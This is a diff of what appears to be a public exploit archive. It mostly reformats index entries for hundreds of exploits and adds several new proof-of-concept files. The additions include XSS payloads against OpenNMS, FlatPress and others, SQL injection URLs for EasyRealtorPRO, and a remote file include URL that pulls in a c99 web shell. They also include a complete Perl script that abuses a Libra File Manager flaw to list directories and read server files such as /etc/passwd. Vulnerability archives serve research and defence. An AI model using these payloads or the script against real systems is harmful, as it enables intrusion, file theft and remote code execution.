 10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0
 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0
 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0
@ -11180,7 +11180,7 @@ id,file,description,date,author,platform,type,port
 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
 12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
-12255,platforms/windows/local/12255.rb,"Winamp 5.572 whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
+12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
 12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"laurent gaffie",windows,dos,0
@ -12628,7 +12628,7 @@ id,file,description,date,author,platform,type,port
 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0
 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0
 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0
-14412,platforms/windows/remote/14412.rb,"Hero DVD Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
+14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
 14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0
 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0
@ -13066,7 +13066,7 @@ id,file,description,date,author,platform,type,port
 15011,platforms/php/webapps/15011.txt,"moaub #15 - php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0
 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
-15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
+15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
 15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
 15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
@ -13182,7 +13182,7 @@ id,file,description,date,author,platform,type,port
 15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0
 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0
 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0
-15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
+15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
 15186,platforms/hardware/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0
 15188,platforms/hardware/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0
 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
@ -14433,7 +14433,7 @@ id,file,description,date,author,platform,type,port
 16650,platforms/windows/local/16650.rb,"Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)",2010-09-25,metasploit,windows,local,0
 16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,metasploit,windows,local,0
 16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-25,metasploit,windows,local,0
-16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
+16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
 16654,platforms/windows/local/16654.rb,"Orbital Viewer ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0
 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0
 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,metasploit,windows,local,0
@ -14535,7 +14535,7 @@ id,file,description,date,author,platform,type,port
 16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80
 16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,metasploit,windows,remote,80
 16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,metasploit,windows,remote,80
-16755,platforms/windows/remote/16755.rb,"Novell iManager getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080
+16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080
 16756,platforms/windows/remote/16756.rb,"Sambar 6 Search Results Buffer Overflow",2010-02-13,metasploit,windows,remote,80
 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300
 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999
@ -14687,7 +14687,7 @@ id,file,description,date,author,platform,type,port
 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,metasploit,hardware,webapps,0
 16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,metasploit,cgi,webapps,0
 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,metasploit,php,webapps,0
-16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing Command Injection",2011-01-08,metasploit,linux,remote,0
+16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,metasploit,linux,remote,0
 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,metasploit,php,webapps,0
 16912,platforms/php/webapps/16912.rb,"Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0
 16913,platforms/php/webapps/16913.rb,"PhpMyAdmin Config File Code Injection",2010-07-03,metasploit,php,webapps,0
@ -14762,7 +14762,7 @@ id,file,description,date,author,platform,type,port
 16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0
 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0
 16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0
-16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
+16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0
 16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
@ -14924,7 +14924,7 @@ id,file,description,date,author,platform,type,port
 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
-17177,platforms/windows/local/17177.rb,"MS Word Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
+17177,platforms/windows/local/17177.rb,"MS Word - Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
 17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0
 17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0
 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0
@ -15093,7 +15093,7 @@ id,file,description,date,author,platform,type,port
 17390,platforms/php/webapps/17390.txt,"SUBRION CMS Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0
 17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0
 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0
-17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
+17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 0day File Inclusion Vulnerability",2011-06-13,jdc,php,webapps,0
 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0
 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 Remote Crash",2011-06-14,echo,windows,dos,0
@ -15165,7 +15165,7 @@ id,file,description,date,author,platform,type,port
 17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0
 17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0
 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
-17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
+17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0
 17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0
 17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
@ -15312,7 +15312,7 @@ id,file,description,date,author,platform,type,port
 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2011-08-10,metasploit,windows,remote,0
 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0
-17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
+17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0
 17659,platforms/windows/remote/17659.rb,"MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0
 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0
@ -16632,7 +16632,7 @@ id,file,description,date,author,platform,type,port
 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 Super Syslog Buffer Overflow Vulnerability",1999-02-25,c0nd0r,linux,local,0
 19271,platforms/linux/dos/19271.c,"Linux kernel 2.0 TCP Port DoS Vulnerability",1999-01-19,"David Schwartz",linux,dos,0
 19272,platforms/linux/local/19272,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0
-19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0
+19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0
 19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df Vulnerability",1997-05-24,"David Hedley",irix,local,0
 19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0
 19276,platforms/irix/local/19276.c,"SGI IRIX <= 6.2 eject Vulnerability (1)",1997-05-25,DCRH,irix,local,0
@ -21635,7 +21635,7 @@ id,file,description,date,author,platform,type,port
 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0
 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0
-24467,platforms/windows/remote/24467.rb,"ActFax 5.01 RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
+24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
 24468,platforms/windows/dos/24468.pl,"KMPlayer Denial of Service All Versions",2013-02-10,Jigsaw,windows,dos,0
 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0
 24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager Heap Overflow PoC",2013-02-10,"Evren Yalç?n",windows,dos,0
@ -29184,3 +29184,22 @@ id,file,description,date,author,platform,type,port
 32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
 32416,platforms/php/remote/32416.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
 32417,platforms/php/remote/32417.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
 32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 'site_search.php' Multiple SQL Injection Vulnerabilities",2008-09-25,"David Sopas",php,webapps,0
 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability",2008-09-25,Pepelux,php,webapps,0
 32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service Vulnerability",2008-09-25,Ciph3r,windows,dos,0
 32421,platforms/php/webapps/32421.html,"FlatPress 0.804 Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
 32422,platforms/php/webapps/32422.txt,"Vikingboard <= 0.2 Beta 'register.php' SQL Column Truncation Unauthorized Access Vulnerability",2008-09-25,StAkeR,php,webapps,0
 32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0
 32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x notification/list.jsp username Parameter XSS",2008-09-25,d2d,jsp,webapps,0
 32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x event/list filter Parameter XSS",2008-09-25,d2d,jsp,webapps,0
 32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 Remote Stack Buffer Overflow Vulnerability",2008-09-26,"Ruben Santamarta ",windows,remote,0
 32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 'LSTable.php' Remote File Include Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
 32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 HTTP Proxy Remote Denial of Service Vulnerability",2008-09-26,quakerdoomer,windows,dos,0
 32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 ActiveX Control 'CanUninstall()' Buffer Overflow Vulnerability",2008-09-27,Satan_HackerS,windows,remote,0
 32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 'wholite.cgi' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",cgi,webapps,0
 32431,platforms/php/webapps/32431.txt,"Lyrics Script 'search_results.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
 32432,platforms/php/webapps/32432.txt,"Clickbank Portal 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
 32433,platforms/php/webapps/32433.txt,"Membership Script Multiple Cross Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0
 32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
--- a/platforms/cgi/webapps/1680.pm
+++ b/platforms/cgi/webapps/1680.pm
@ -1,4 +1,3 @@
 ##
 # This file is part of the Metasploit Framework and may be redistributed
 # according to the licenses defined in the Authors field below. In the
--- a/platforms/cgi/webapps/32430.txt
+++ b/platforms/cgi/webapps/32430.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/31436/info
 WhoDomLite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 WhoDomLite 1.1.3 is vulnerable; other versions may also be affected. 
 http://www.example.com/wholite.cgi?dom= xss_code &tld=com&action=search 
--- a/platforms/jsp/webapps/32423.txt
+++ b/platforms/jsp/webapps/32423.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/31410/info
 OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Versions prior to OpenNMS 1.5.94 are vulnerable. 
 http://www.example.com/opennms/j_acegi_security_check?j_username=test'><script>alert('hi');</script>&j_password=test 
--- a/platforms/jsp/webapps/32424.txt
+++ b/platforms/jsp/webapps/32424.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/31410/info
 OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Versions prior to OpenNMS 1.5.94 are vulnerable. 
 http://www.example.com/opennms/notification/list.jsp?username=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E
--- a/platforms/jsp/webapps/32425.txt
+++ b/platforms/jsp/webapps/32425.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/31410/info
 OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Versions prior to OpenNMS 1.5.94 are vulnerable. 
 http://www.example.com/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.* 
--- a/platforms/php/webapps/32418.txt
+++ b/platforms/php/webapps/32418.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/31401/info
 EasyRealtorPRO is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
 Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc&page=2&item=5'SQL INJECTION
 http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc'SQL INJECTION&page=2&item=5
 http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type'SQL INJECTION&search_ordermethod=asc&page=2&item=5 
--- a/platforms/php/webapps/32419.pl
+++ b/platforms/php/webapps/32419.pl
@ -0,0 +1,101 @@
 source: http://www.securityfocus.com/bid/31403/info
 Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
 Libra File Manager 2.0 and prior versions are available. 
 #! /usr/bin/perl
 # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 # Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability
 # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 # Program: Libra PHP File Manager
 # Version: <= 1.18
 # File affected: fileadmin.php
 # Download: http://file.sourceforge.net
 #
 #
 # Found by Pepelux <pepelux[at]enye-sec.org>
 # eNYe-Sec - www.enye-sec.org
 # Greetings to Ka0x for help me with the perl code   :) 
 #
 # You can scale directories and read any file that you have permissions
 use LWP::UserAgent;
 $ua = LWP::UserAgent->new;
 print "\e[2J";
 system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 my ($host, $path, $action) = @ARGV ;
 unless($ARGV[2]) {
       print "Usage: perl $0 <host> <path> <action>\n";
       print "\tex: perl $0 http://www.example.com /etc/ list\n";
       print "\tex: perl $0 http://www.example.com /etc/passwd edit\n";
       print "Actions:\n";
       print "   list:\n";
       print "   edit:\n\n";
       exit 1;
 }
 $ua->agent("$0/0.1 " . $ua->agent);
 $host = "http://".$host if ($host !~ /^http:/);
 $path = $path."/" if ($action eq "list" && $path !~ /\/$/);
 $op = "home" if ($action == "list");
 if ($action eq "edit") {
       $aux = $path;
       $directory = "";
       do {
               $x = index($aux, "/");
               $y = length($aux) - $x;
               $directory .= substr($aux, 0, $x+1);
               $aux = substr($aux, $x+1, $y);
       } until ($x == -1);
       $path = $directory;
       $file = $aux;
       $op = "edit";
 }
 $url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path;
 $url .= "&fename=".$file if ($action eq "edit");
 $req = HTTP::Request->new(GET => $url);
 $req->header('Accept' => 'text/html');
 $res = $ua->request($req);
 if ($res->is_success) {
       $result = $res->content;
       if ($action eq "edit") {
               print "Viewing $path$file:\n";
               print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s);
       }
       else {
               print "Files in $path:\n";
               $x = index($result, "Files:") + 6;
               $result = substr($result, $x, length($result)-$x);
               $result =~ s/<[^>]*>//g;
               $result =~ s/Filename//g;
               $result =~ s/Size//g;
               $result =~ s/Edit//g;
               $result =~ s/Rename//g;
               $result =~ s/Delete//g;
               $result =~ s/Move//g;
               $result =~ s/View//g;
               $result =~ s/Open//g;
               $result =~ s/\d*//g;
               $result =~ s/\s+/\n/g;
               $x = index($result, "Copyright");
               $result = substr($result, 0, $x);
               print $result;
       }
 }
 else { print "Error: " . $res->status_line . "\n";}
--- a/platforms/php/webapps/32421.html
+++ b/platforms/php/webapps/32421.html
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/31407/info
 FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Versions prior to FlatPress 0.804.1 are vulnerable. 
 <form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="user" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="pass" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/contact.php"> <input type="text" name="name" value='"><script>alert(1)</script>'> <input type=submit></form> 
--- a/platforms/php/webapps/32422.txt
+++ b/platforms/php/webapps/32422.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/31408/info
 Vikingboard is prone to an unauthorized-access vulnerability.
 Successfully exploiting this issue can allow attackers to register and log in as existing users.
 Vikingboard 0.2 Beta is vulnerable; other versions may also be affected.
 The following example account registration data is available:
 Username: [username][whitespace characters]NULL
 Password: [password]
 E-Mail: [E-Mail] 
--- a/platforms/php/webapps/32427.txt
+++ b/platforms/php/webapps/32427.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/31419/info
 Barcode Generator is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
 Barcode Generator 2.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://example2.com/shell/c99.txt? 
--- a/platforms/php/webapps/32431.txt
+++ b/platforms/php/webapps/32431.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/31437/info
 Lyrics Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/search_results.php?k= XSS_CODE 
